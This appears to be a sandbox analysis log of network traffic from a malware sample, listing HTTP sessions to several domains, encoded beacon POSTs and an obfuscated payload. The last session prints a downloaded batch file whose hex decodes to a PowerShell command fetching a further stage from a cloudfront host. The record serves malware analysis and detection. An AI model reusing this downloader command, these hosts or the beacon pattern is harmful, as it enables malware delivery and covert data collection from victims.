Apr 26, 2024 17:12:32.672502041 CEST	499	IN	HTTP/1.1 200 OK Content-Type: text/plain Content-Length: 10 Connection: keep-alive Date: Fri, 26 Apr 2024 08:50:06 GMT Last-Modified: Fri, 05 Apr 2024 03:33:22 GMT ETag: "e66a67cb1dd3dbb4922bb1983a4f5422" x-amz-server-side-encryption: AES256 Accept-Ranges: bytes Server: AmazonS3 X-Cache: Hit from cloudfront Via: 1.1 3f72a8b28c744ea2f627e9f8a8ac8282.cloudfront.net (CloudFront) X-Amz-Cf-Pop: MIA3-C1 X-Amz-Cf-Id: dU5xS75_99VlsNVMrkUboo1HLrmriGFv1YHepPB5BYhLME_foEDWdw== Age: 22947
Apr 26, 2024 17:12:32.674021959 CEST	10	IN	Data Raw: 32 2e 30 2e 30 2e 33 31 33 33 Data Ascii: 2.0.0.3133

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.5	49779	185.22.66.15	80

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 17:12:42.131469011 CEST	116	OUT	GET /clrls/cl_rls.json HTTP/1.1 Host: www.rapidfilestorage.com Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:12:42.459428072 CEST	1289	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 26 Apr 2024 15:12:42 GMT Content-Type: application/json Content-Length: 50997 Connection: keep-alive Set-Cookie: slb_route=53cbd94bd254a28a3e76d367ee86d88e; Path=/; Secure; HttpOnly Last-Modified: Wed, 24 Apr 2024 08:42:48 GMT ETag: "6628c608-c735" Accept-Ranges: bytes X-Resolver-IP: 185.22.66.15 X-Resolver-IP: 185.22.66.15 Data Raw: 2d 47 72 53 33 56 73 53 34 51 72 53 31 45 72 53 38 46 72 53 30 5b 72 53 36 7a 71 53 39 45 72 53 34 5c 72 53 37 56 73 53 38 4e 73 53 31 58 73 53 33 47 72 53 30 56 73 53 32 57 72 53 34 56 73 53 32 4e 73 53 37 58 73 53 34 61 71 53 37 56 73 53 33 59 71 53 32 5a 72 53 39 45 72 53 34 46 72 53 35 56 72 53 31 5b 72 53 33 43 72 53 38 5c 72 53 34 60 71 53 31 59 72 53 36 5d 72 53 37 55 72 53 32 56 73 53 34 64 73 53 33 58 73 53 36 56 73 53 32 63 71 53 33 60 71 53 38 70 71 53 39 5b 72 53 36 43 72 53 31 5c 72 53 37 5e 72 53 34 5b 72 53 34 51 72 53 37 56 72 53 39 55 72 53 33 7a 71 53 30 56 73 53 32 64 73 53 31 58 73 53 37 56 73 53 36 45 72 53 38 6a 71 53 34 51 72 53 37 7a 71 53 31 56 73 53 34 64 73 53 39 58 73 53 35 56 73 53 36 5e 73 53 35 49 72 53 33 4f 72 53 38 6b 71 53 33 45 72 53 39 46 72 53 39 5b 72 53 38 78 71 53 37 51 72 53 33 45 72 53 32 5c 72 53 33 4f 72 53 39 5a 72 53 35 65 71 53 31 56 73 53 38 64 73 53 33 58 73 53 37 56 73 53 32 44 72 53 31 43 72 53 32 56 72 53 32 7a 71 53 35 44 72 53 35 51 72 53 39 5a 72 53 34 59 72 53 30 46 72 53 30 42 72 53 39 56 73 53 31 64 73 53 31 58 73 53 39 56 73 53 35 5d 71 53 36 55 72 53 33 50 72 53 32 5a 71 53 31 45 72 53 32 5e 72 53 38 55 72 53 39 7a 71 53 33 56 73 53 35 64 73 53 35 58 73 53 36 56 73 53 39 75 71 53 33 5c 72 53 36 55 72 53 33 46 72 53 32 51 72 53 32 50 72 53 33 50 72 53 36 55 72 53 33 7a 71 53 39 56 73 53 33 64 73 53 37 58 73 53 39 56 73 53 35 79 71 53 33 5d 72 53 31 56 72 53 37 54 72 53 38 7a 71 53 31 57 72 53 39 56 73 53 39 64 73 53 36 58 73 53 37 56 73 53 37 77 71 53 35 59 72 53 34 4f 72 53 32 7a 71 53 31 5b 72 53 32 79 71 53 39 5b 72 53 36 54 72 53 34 46 72 53 38 58 73 53 36 5e 71 53 33 59 72 53 36 79 71 53 36 45 72 53 39 51 72 53 31 5e 72 53 38 58 73 53 37 59 71 53 35 46 72 53 37 45 72 53 30 56 72 53 36 59 72 53 33 5b 72 53 34 56 73 53 37 67 71 53 34 64 73 53 39 58 73 53 35 56 73 53 32 44 72 53 34 56 73 53 38 4e 73 53 33 58 73 53 38 61 71 53 32 56 73 53 39 5e 73 53 34 59 71 53 36 5a 72 53 36 45 72 53 32 46 72 53 38 56 72 53 31 5b 72 53 30 43 72 53 32 5c 72 53 31 60 71 53 32 59 72 53 39 5d 72 53 31 55 72 53 32 56 73 53 32 67 71 53 33 4d 72 53 38 64 73 53 30 58 73 53 31 56 73 53 30 4f 72 53 36 5a 72 53 33 7a 71 53 36 5b 72 53 31 5d 72 53 36 59 72 53 38 45 72 53 33 5d 72 53 32 79 71 53 37 56 73 53 30 4e 73 53 31 58 73 53 39 61 71 53 33 56 73 53 38 51 72 53 36 51 72 53 39 51 72 53 37 51 72 53 37 51 72 53 36 56 72 53 33 53 72 53 38 55 72 53 33 42 72 53 32 58 72 53 38 57 72 53 35 56 72 53 30 54 72 53 36 54 72 53 36 5a 72 53 33 58 72 53 32 50 72 53 36 57 72 53 35 54 72 53 39 58 72 53 38 53 72 53 39 5c 72 53 38 5c 72 53 36 54 72 53 37 54 72 53 32 5c 72 53 39 54 72 53 34 4f 72 53 39 54 72 53 38 54 72 53 35 50 72 53 32 53 72 53 Data Ascii: -GrS3VsS4QrS1ErS8FrS0[rS6zqS9ErS4\rS7VsS8NsS1XsS3GrS0VsS2WrS4VsS2NsS7XsS4aqS7VsS3YqS2ZrS9ErS4FrS5VrS1[rS3CrS8\rS4`qS1YrS6]rS7UrS2VsS4dsS3XsS6VsS2cqS3`qS8pqS9[rS6CrS1\rS7^rS4[rS4QrS7VrS9UrS3zqS0VsS2dsS1XsS7VsS6ErS8jqS4QrS7zqS1VsS4dsS9XsS5VsS6^sS5IrS3OrS8kqS3ErS9FrS9[rS8xqS7QrS3ErS2\rS3OrS9ZrS5eqS1VsS8dsS3XsS7VsS2DrS1CrS2VrS2zqS5DrS5QrS9ZrS4YrS0FrS0BrS9VsS1dsS1XsS9VsS5]qS6UrS3PrS2ZqS1ErS2^rS8UrS9zqS3VsS5dsS5XsS6VsS9uqS3\rS6UrS3FrS2QrS2PrS3PrS6UrS3zqS9VsS3dsS7XsS9VsS5yqS3]rS1VrS7TrS8zqS1WrS9VsS9dsS6XsS7VsS7wqS5YrS4OrS2zqS1[rS2yqS9[rS6TrS4FrS8XsS6^qS3YrS6yqS6ErS9QrS1^rS8XsS7YqS5FrS7ErS0VrS6YrS3[rS4VsS7gqS4dsS9XsS5VsS2DrS4VsS8NsS3XsS8aqS2VsS9^sS4YqS6ZrS6ErS2FrS8VrS1[rS0CrS2\rS1`qS2YrS9]rS1UrS2VsS2gqS3MrS8dsS0XsS1VsS0OrS6ZrS3zqS6[rS1]rS6YrS8ErS3]rS2yqS7VsS0NsS1XsS9aqS3VsS8QrS6QrS9QrS7QrS7QrS6VrS3SrS8UrS3BrS2XrS8WrS5VrS0TrS6TrS6ZrS3XrS2PrS6WrS5TrS9XrS8SrS9\rS8\rS6TrS7TrS2\rS9TrS4OrS9TrS8TrS5PrS2SrS
Apr 26, 2024 17:12:42.459474087 CEST	1289	IN	Data Raw: 33 56 73 53 39 64 73 53 35 58 73 53 38 56 73 53 32 51 72 53 34 51 72 53 39 51 72 53 35 51 72 53 30 51 72 53 38 55 72 53 36 58 72 53 33 51 72 53 31 53 72 53 34 5a 72 53 33 5c 72 53 39 50 72 53 35 4f 72 53 33 58 72 53 31 59 72 53 32 5e 72 53 37 59 Data Ascii: 3VsS9dsS5XsS8VsS2QrS4QrS9QrS5QrS0QrS8UrS6XrS3QrS1SrS4ZrS3\rS9PrS5OrS3XrS1YrS2^rS7YrS7\rS4VrS2BrS9WrS4SrS8]rS4OrS5]rS4VrS9TrS1^rS4BrS1SrS8XrS4TrS1VsS1dsS2XsS5VsS6QrS8QrS2QrS7QrS2QrS2BrS7VrS0OrS6XrS7TrS9QrS8[rS6]rS7WrS0QrS2TrS2\rS9PrS6BrS8[rS0Or
Apr 26, 2024 17:12:42.459487915 CEST	1289	IN	Data Raw: 5d 72 53 31 5a 72 53 35 56 73 53 30 64 73 53 34 58 73 53 34 56 73 53 34 51 72 53 37 59 72 53 35 59 72 53 31 5d 72 53 31 56 72 53 32 57 72 53 34 56 72 53 35 5c 72 53 31 53 72 53 39 54 72 53 39 4f 72 53 39 59 72 53 39 42 72 53 31 58 72 53 35 5b 72 Data Ascii: ]rS1ZrS5VsS0dsS4XsS4VsS4QrS7YrS5YrS1]rS1VrS2WrS4VrS5\rS1SrS9TrS9OrS9YrS9BrS1XrS5[rS5ZrS7PrS7XrS0UrS5\rS4WrS1QrS9ZrS8ZrS5^rS7ZrS2OrS6OrS5BrS0VrS3PrS4OrS8VsS7dsS5XsS4VsS3QrS9WrS6ZrS5VrS3PrS7^rS9PrS7XrS7UrS0PrS8]rS2PrS6^rS3^rS0ZrS5YrS9\rS5BrS8[rS
Apr 26, 2024 17:12:42.459501028 CEST	1289	IN	Data Raw: 72 53 33 5c 72 53 36 5d 72 53 37 5c 72 53 31 56 73 53 36 64 73 53 36 58 73 53 31 56 73 53 35 50 72 53 38 56 72 53 36 54 72 53 32 58 72 53 34 4f 72 53 34 42 72 53 35 56 72 53 37 59 72 53 30 5c 72 53 37 5b 72 53 36 5d 72 53 33 5d 72 53 39 51 72 53 Data Ascii: rS3\rS6]rS7\rS1VsS6dsS6XsS1VsS5PrS8VrS6TrS2XrS4OrS4BrS5VrS7YrS0\rS7[rS6]rS3]rS9QrS1BrS8XrS0TrS2SrS2OrS7ZrS1ZrS2PrS7PrS6YrS1BrS4TrS0ZrS3ZrS0\rS7]rS6TrS5SrS8YrS9VsS1dsS8XsS4VsS8PrS8TrS9QrS8[rS6ZrS4BrS1]rS0XrS1]rS8ZrS7VrS1SrS0\rS0XrS1PrS0^rS6[rS8
Apr 26, 2024 17:12:42.459534883 CEST	1289	IN	Data Raw: 53 38 59 72 53 33 4f 72 53 39 42 72 53 34 59 72 53 38 57 72 53 30 56 73 53 30 64 73 53 36 58 73 53 30 56 73 53 36 4f 72 53 32 51 72 53 30 54 72 53 33 59 72 53 38 4f 72 53 39 5c 72 53 33 59 72 53 32 58 72 53 35 50 72 53 31 55 72 53 36 4f 72 53 34 Data Ascii: S8YrS3OrS9BrS4YrS8WrS0VsS0dsS6XsS0VsS6OrS2QrS0TrS3YrS8OrS9\rS3YrS2XrS5PrS1UrS6OrS4VrS0OrS5UrS0UrS1\rS1]rS4SrS1TrS8BrS3ZrS3BrS2[rS4QrS0QrS8]rS4[rS2BrS5]rS3]rS7XrS4SrS2VsS5dsS4XsS2VsS3OrS6PrS0PrS0BrS8YrS6OrS7\rS0PrS6OrS0XrS6QrS1UrS7UrS3UrS5\rS3P
Apr 26, 2024 17:12:42.459548950 CEST	1289	IN	Data Raw: 35 54 72 53 36 5d 72 53 35 42 72 53 37 58 72 53 33 56 72 53 39 42 72 53 34 55 72 53 31 56 73 53 33 64 73 53 39 58 73 53 33 56 73 53 32 4f 72 53 39 5e 72 53 38 42 72 53 39 5a 72 53 30 4f 72 53 38 5d 72 53 36 42 72 53 32 4f 72 53 36 42 72 53 39 42 Data Ascii: 5TrS6]rS5BrS7XrS3VrS9BrS4UrS1VsS3dsS9XsS3VsS2OrS9^rS8BrS9ZrS0OrS8]rS6BrS2OrS6BrS9BrS7PrS3BrS3WrS6[rS3\rS4OrS4TrS8XrS9^rS2PrS9^rS0VrS0^rS3[rS8ZrS2^rS7ZrS6QrS9BrS8]rS5^rS0TrS9VsS2dsS4XsS7VsS8OrS0]rS5UrS5QrS9WrS9SrS7XrS7SrS0SrS7XrS9VrS8^rS7OrS3Br
Apr 26, 2024 17:12:42.459562063 CEST	1289	IN	Data Raw: 5d 72 53 32 58 72 53 34 51 72 53 38 5c 72 53 31 57 72 53 39 5d 72 53 30 50 72 53 31 4f 72 53 30 4f 72 53 38 56 73 53 33 64 73 53 31 58 73 53 36 56 73 53 37 56 72 53 34 50 72 53 35 5a 72 53 32 58 72 53 38 56 72 53 30 50 72 53 32 54 72 53 32 53 72 Data Ascii: ]rS2XrS4QrS8\rS1WrS9]rS0PrS1OrS0OrS8VsS3dsS1XsS6VsS7VrS4PrS5ZrS2XrS8VrS0PrS2TrS2SrS6UrS5WrS7XrS6TrS0OrS1TrS2WrS1WrS3TrS9XrS5XrS7]rS8^rS9]rS4[rS8XrS6ZrS6PrS2^rS6^rS0ZrS4PrS2ZrS9[rS2VsS4dsS4XsS6VsS0VrS3OrS7ZrS3^rS6\rS8BrS5OrS2[rS2VrS1WrS6BrS1TrS
Apr 26, 2024 17:12:42.459630013 CEST	1289	IN	Data Raw: 72 53 32 5c 72 53 30 5c 72 53 34 54 72 53 33 5a 72 53 32 51 72 53 37 50 72 53 37 58 72 53 35 42 72 53 38 56 72 53 38 55 72 53 37 56 73 53 34 64 73 53 36 58 73 53 36 56 73 53 36 56 72 53 37 57 72 53 35 42 72 53 37 50 72 53 30 5b 72 53 34 5c 72 53 Data Ascii: rS2\rS0\rS4TrS3ZrS2QrS7PrS7XrS5BrS8VrS8UrS7VsS4dsS6XsS6VsS6VrS7WrS5BrS7PrS0[rS4\rS2]rS0PrS8PrS7ZrS3PrS3PrS7WrS5XrS8^rS6ZrS1]rS1TrS6PrS8[rS6YrS8OrS0TrS3^rS0ZrS9\rS4]rS2VrS8]rS4]rS0BrS8WrS0VsS5dsS0XsS2VsS2VrS9^rS4BrS8TrS4QrS5]rS0^rS4UrS0QrS1[rS1
Apr 26, 2024 17:12:42.459645033 CEST	1289	IN	Data Raw: 53 39 5c 72 53 38 4f 72 53 31 56 72 53 33 58 72 53 32 5b 72 53 33 59 72 53 38 56 72 53 31 4f 72 53 30 55 72 53 34 59 72 53 36 5e 72 53 32 57 72 53 37 56 73 53 32 64 73 53 39 58 73 53 38 56 73 53 34 55 72 53 37 55 72 53 34 55 72 53 35 4f 72 53 34 Data Ascii: S9\rS8OrS1VrS3XrS2[rS3YrS8VrS1OrS0UrS4YrS6^rS2WrS7VsS2dsS9XsS8VsS4UrS7UrS4UrS5OrS4ZrS4UrS4YrS3]rS8VrS8^rS7WrS0[rS2BrS7\rS8BrS6QrS4XrS3TrS3OrS4VrS2]rS0QrS6OrS9SrS0WrS4XrS6^rS3WrS7OrS2]rS7XrS6YrS3VsS1dsS9XsS1VsS2UrS0UrS8WrS5PrS4PrS5]rS5SrS0^rS5P
Apr 26, 2024 17:12:42.459661007 CEST	1289	IN	Data Raw: 34 56 72 53 37 56 72 53 32 56 72 53 32 4f 72 53 34 54 72 53 35 58 72 53 35 4f 72 53 33 51 72 53 34 5a 72 53 34 42 72 53 38 51 72 53 30 58 72 53 33 5c 72 53 38 5d 72 53 38 56 73 53 32 64 73 53 30 58 73 53 39 56 73 53 34 55 72 53 34 5e 72 53 38 59 Data Ascii: 4VrS7VrS2VrS2OrS4TrS5XrS5OrS3QrS4ZrS4BrS8QrS0XrS3\rS8]rS8VsS2dsS0XsS9VsS4UrS4^rS8YrS9OrS4BrS3XrS7ZrS2OrS4YrS6VrS2ZrS0BrS8XrS6[rS3]rS1ZrS9YrS2PrS9YrS2TrS4TrS0[rS3XrS8BrS6YrS3\rS8BrS4]rS7]rS6BrS0YrS6^rS6VsS9dsS3XsS1VsS7UrS6[rS5SrS0UrS2QrS2PrS8Ur
Apr 26, 2024 17:12:42.784851074 CEST	1289	IN	Data Raw: 5e 72 53 37 4f 72 53 38 5d 72 53 37 42 72 53 34 57 72 53 31 59 72 53 37 59 72 53 31 58 72 53 34 5c 72 53 38 56 72 53 39 58 72 53 33 55 72 53 31 59 72 53 30 56 72 53 36 4f 72 53 34 5e 72 53 35 56 73 53 34 64 73 53 37 58 73 53 33 56 73 53 30 54 72 Data Ascii: ^rS7OrS8]rS7BrS4WrS1YrS7YrS1XrS4\rS8VrS9XrS3UrS1YrS0VrS6OrS4^rS5VsS4dsS7XsS3VsS0TrS7UrS0UrS9YrS2^rS0ZrS5]rS1^rS9TrS8OrS0BrS9TrS0OrS2ZrS0BrS7PrS5SrS5[rS5WrS6\rS7[rS4UrS9UrS0TrS5VrS6WrS4PrS1SrS5YrS0[rS6\rS7XrS0VsS1dsS8XsS3VsS8TrS3SrS8^rS3VrS1\rS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49780	185.22.66.15	80	6252	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 17:12:42.157459974 CEST	382	OUT	GET /updates/yd/wrtzr_yt_a_1/win/version.txt?tiEOSnvauSGeSrVtrRTjdcdKOYxLWZZtj HTTP/1.1 Accept: / Cache-Control: no-cache Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: www.rapidfilestorage.com Connection: Keep-Alive
Apr 26, 2024 17:12:42.487855911 CEST	383	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 26 Apr 2024 15:12:42 GMT Content-Type: text/plain Content-Length: 10 Connection: keep-alive Set-Cookie: slb_route=5bc3c54cb547508a0b8769804e406869; Path=/; Secure; HttpOnly Last-Modified: Fri, 05 Apr 2024 02:56:30 GMT ETag: "660f685e-a" Accept-Ranges: bytes X-Resolver-IP: 185.22.66.15 X-Resolver-IP: 185.22.66.15 Data Raw: 32 2e 30 2e 30 2e 33 31 33 33 Data Ascii: 2.0.0.3133

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.5	49781	44.239.127.146	80

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 17:12:42.226610899 CEST	296	OUT	POST /api2/google_api_ifi HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/0 Safari/537.36 Host: api4.check-data.xyz Content-Length: 733 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:12:42.226619959 CEST	733	OUT	Data Raw: 6b 3d 77 6c 31 5a 70 6a 31 6c 78 6d 35 55 41 66 31 54 76 32 41 62 41 36 54 4a 26 72 3d 42 47 4f 47 35 44 47 4f 47 31 57 46 4f 47 32 42 47 4f 47 38 43 47 4f 47 38 26 67 3d 4a 4b 4f 47 31 4c 47 4f 47 34 59 46 4f 47 32 41 47 4f 47 34 42 47 4f 47 39 Data Ascii: k=wl1Zpj1lxm5UAf1Tv2AbA6TJ&r=BGOG5DGOG1WFOG2BGOG8CGOG8&g=JKOG1LGOG4YFOG2AGOG4BGOG9KGOG7DGOG5XFOG1XGOG0ZFOG5GKOG2LKOG8XFOG5XGOG2YFOG5LGOG9YFOG6HKOG3XGOG0KGOG4XFOG1HKOG9YFOG5XGOG4DGOG1DGOG7DGOG0EKOG6DGOG0IKOG9YFOG0LGOG1LKOG2DGOG4EKOG3GKOG1&v=AGO
Apr 26, 2024 17:12:42.460319996 CEST	404	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Cache-control: no-cache="set-cookie" Content-Type: text/html; charset=UTF-8 Date: Fri, 26 Apr 2024 15:12:00 GMT Server: nginx Set-Cookie: AWSELB=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9820401D99493DFDF796F3DAB0062EEFB3E4A533F5B2753F2532FBA9D17E5754692E8600D254000879A4CE3001E279F1EF5;PATH=/;MAX-AGE=43200 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.5	49782	185.22.66.15	80

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 17:12:42.653552055 CEST	197	OUT	GET /updates/yd/wrtzr_yt_a_1/win/version.txt HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: www.rapidfilestorage.com
Apr 26, 2024 17:12:42.983146906 CEST	383	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 26 Apr 2024 15:12:42 GMT Content-Type: text/plain Content-Length: 10 Connection: keep-alive Set-Cookie: slb_route=7a3a2467745113d9c45cd9e9d2dad299; Path=/; Secure; HttpOnly Last-Modified: Fri, 05 Apr 2024 02:56:30 GMT ETag: "660f685e-a" Accept-Ranges: bytes X-Resolver-IP: 185.22.66.15 X-Resolver-IP: 185.22.66.15 Data Raw: 32 2e 30 2e 30 2e 33 31 33 33 Data Ascii: 2.0.0.3133

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.5	49783	194.67.87.38	80

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 17:12:45.047539949 CEST	374	OUT	GET /updates/yd/wrtzr_yt_a_1/win/version.txt?DBNgrjReMPwMuUWVmgNCxBVhWTyizBQlm HTTP/1.1 Accept: / Cache-Control: no-cache Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: helsinki-dtc.com Connection: Keep-Alive
Apr 26, 2024 17:12:45.325081110 CEST	264	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 15:12:44 GMT Content-Type: text/plain Content-Length: 10 Last-Modified: Fri, 05 Apr 2024 03:22:15 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "660f6e67-a" Accept-Ranges: bytes Data Raw: 32 2e 30 2e 30 2e 33 31 33 33 Data Ascii: 2.0.0.3133

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.5	49784	194.67.87.38	80

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 17:12:45.215107918 CEST	189	OUT	GET /updates/yd/wrtzr_yt_a_1/win/version.txt HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: helsinki-dtc.com
Apr 26, 2024 17:12:45.503298998 CEST	264	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 15:12:44 GMT Content-Type: text/plain Content-Length: 10 Last-Modified: Fri, 05 Apr 2024 03:22:15 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "660f6e67-a" Accept-Ranges: bytes Data Raw: 32 2e 30 2e 30 2e 33 31 33 33 Data Ascii: 2.0.0.3133

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.5	49785	13.32.87.24	80

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 17:12:45.727756977 CEST	386	OUT	GET /updates/yd/wrtzr_yt_a_1/win/version.txt?WgPZvcyXhSTVdehKKNnpLpnrTYhLSWhya HTTP/1.1 Accept: / Cache-Control: no-cache Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: skrptfiles.tracemonitors.com Connection: Keep-Alive
Apr 26, 2024 17:12:45.852478027 CEST	499	IN	HTTP/1.1 200 OK Content-Type: text/plain Content-Length: 10 Connection: keep-alive Date: Fri, 26 Apr 2024 08:50:06 GMT Last-Modified: Fri, 05 Apr 2024 03:33:22 GMT ETag: "e66a67cb1dd3dbb4922bb1983a4f5422" x-amz-server-side-encryption: AES256 Accept-Ranges: bytes Server: AmazonS3 X-Cache: Hit from cloudfront Via: 1.1 7ca860d38523be6631b48c221eed2906.cloudfront.net (CloudFront) X-Amz-Cf-Pop: MIA3-C1 X-Amz-Cf-Id: eELhWcdceuKnOM_EGxGLKqnlDY7j1clF9Oj8dMF7RzfpQo4vT0t5-Q== Age: 22960
Apr 26, 2024 17:12:45.852953911 CEST	10	IN	Data Raw: 32 2e 30 2e 30 2e 33 31 33 33 Data Ascii: 2.0.0.3133

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.5	49786	13.32.87.24	80

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 17:12:45.729212046 CEST	201	OUT	GET /updates/yd/wrtzr_yt_a_1/win/version.txt HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: skrptfiles.tracemonitors.com
Apr 26, 2024 17:12:45.853825092 CEST	499	IN	HTTP/1.1 200 OK Content-Type: text/plain Content-Length: 10 Connection: keep-alive Last-Modified: Fri, 05 Apr 2024 03:33:22 GMT x-amz-server-side-encryption: AES256 Accept-Ranges: bytes Server: AmazonS3 Date: Fri, 26 Apr 2024 08:49:34 GMT ETag: "e66a67cb1dd3dbb4922bb1983a4f5422" X-Cache: Hit from cloudfront Via: 1.1 3b6959d147738fd4bde35db4104f4052.cloudfront.net (CloudFront) X-Amz-Cf-Pop: MIA3-C1 X-Amz-Cf-Id: YcQ2zJ2689LsEfSzfQTdSugBHcb5xoPHaPKRFDk64BQ7pg8J4c_N1A== Age: 22992
Apr 26, 2024 17:12:45.854048967 CEST	10	IN	Data Raw: 32 2e 30 2e 30 2e 33 31 33 33 Data Ascii: 2.0.0.3133

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.5	49803	44.239.127.146	80

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 17:12:59.555608034 CEST	295	OUT	POST /api2/google_api_ifi HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/0 Safari/537.36 Host: api.check-data.xyz Content-Length: 733 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:12:59.555622101 CEST	733	OUT	Data Raw: 6b 3d 61 6d 31 7a 67 50 31 65 53 35 47 77 46 31 47 6b 32 72 4d 78 36 4c 41 74 26 72 3d 44 47 4f 47 35 59 46 4f 47 33 42 47 4f 47 31 41 47 4f 47 32 43 47 4f 47 36 26 67 3d 4a 4b 4f 47 36 4c 47 4f 47 30 59 46 4f 47 37 41 47 4f 47 35 42 47 4f 47 39 Data Ascii: k=am1zgP1eS5GwF1Gk2rMx6LAt&r=DGOG5YFOG3BGOG1AGOG2CGOG6&g=JKOG6LGOG0YFOG7AGOG5BGOG9KGOG1DGOG8XFOG1XGOG6ZFOG6GKOG5LKOG2XFOG2XGOG1YFOG5LGOG9YFOG3HKOG1XGOG3KGOG5XFOG0HKOG7YFOG9XGOG5DGOG5DGOG8DGOG4EKOG3DGOG4IKOG0YFOG4LGOG4LKOG7DGOG6EKOG7GKOG7&v=AGO
Apr 26, 2024 17:12:59.791847944 CEST	404	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Cache-control: no-cache="set-cookie" Content-Type: text/html; charset=UTF-8 Date: Fri, 26 Apr 2024 15:12:17 GMT Server: nginx Set-Cookie: AWSELB=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9820401D99493DFDF796F3DAB0062EEFB3E4A533F5B2753F2532FBA9D17E5754692E8600D254000879A4CE3001E279F1EF5;PATH=/;MAX-AGE=43200 Content-Length: 0 Connection: keep-alive

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	108.157.172.96	443	1900	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 15:10:53 UTC	157	OUT	GET /load/load.php?c=1000 HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: d68kcn56pzfb4.cloudfront.net Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 15:10:53 UTC	477	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: close Server: nginx/1.10.1 Date: Fri, 26 Apr 2024 15:10:53 GMT X-Powered-By: PHP/5.5.38 Content-Description: File Transfer Content-Disposition: attachment; filename="load.bat" X-Cache: Miss from cloudfront Via: 1.1 fe8af35c363442c3ecc406bdb489733e.cloudfront.net (CloudFront) X-Amz-Cf-Pop: MIA3-P3 X-Amz-Cf-Id: l9qXykanM8OMHRjrnh4w0zvYa1GrvPREGNYMCXdHofozqO3dZZmezw==
2024-04-26 15:10:53 UTC	700	IN	Data Raw: 32 62 35 0d 0a 40 45 43 48 4f 20 4f 46 46 0d 0a 63 64 20 25 54 45 4d 50 25 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 2d 43 6f 6d 6d 61 6e 64 20 22 28 4e 65 77 2d 4f 62 6a 65 63 74 20 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 29 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 27 68 74 74 70 73 3a 2f 2f 64 36 38 6b 63 6e 35 36 70 7a 66 62 34 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 6c 6f 61 64 2f 74 68 2e 70 68 70 3f 63 3d 31 30 30 30 27 2c 27 73 74 61 74 27 29 22 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 2d 43 6f 6d 6d 61 6e 64 20 22 28 4e 65 77 2d 4f 62 6a 65 63 74 20 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 29 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 27 68 74 74 70 73 3a 2f 2f 64 36 38 6b 63 6e 35 36 70 7a 66 62 34 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f Data Ascii: 2b5@ECHO OFFcd %TEMP%powershell 